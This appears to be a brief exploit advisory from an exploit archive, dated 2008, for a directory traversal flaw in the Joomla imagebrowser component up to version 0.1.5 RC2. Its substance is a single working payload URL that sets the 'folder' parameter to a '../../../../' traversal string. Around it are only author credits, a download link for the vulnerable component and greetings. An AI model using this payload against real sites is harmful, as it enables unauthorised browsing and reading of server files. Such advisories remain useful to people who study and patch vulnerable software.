id: 3796
date: 09/27/2008
title: Joomla Component imagebrowser <= 0.1.5 RC2 Directory Traversal Vuln
author: Cr@zy_King
cves: 

===================================================================
Joomla Component imagebrowser <= 0.1.5 RC2 Directory Traversal Vuln
===================================================================


Joomla Imagebrowser File Inc.


Cr@zy_King / www.biyosecurity.com / sqL Lov3r'Z Crew Co. 2008


Down : http://www.joomlatr.org/index.php/component/remository/?func=fileinfo&id=129


FI   : http://127.0.0.1/index.php?option=com_imagebrowser&folder=../../../../


Grtz : aLL My Friend'z ... 



#  0day.today [2023-03-23]  #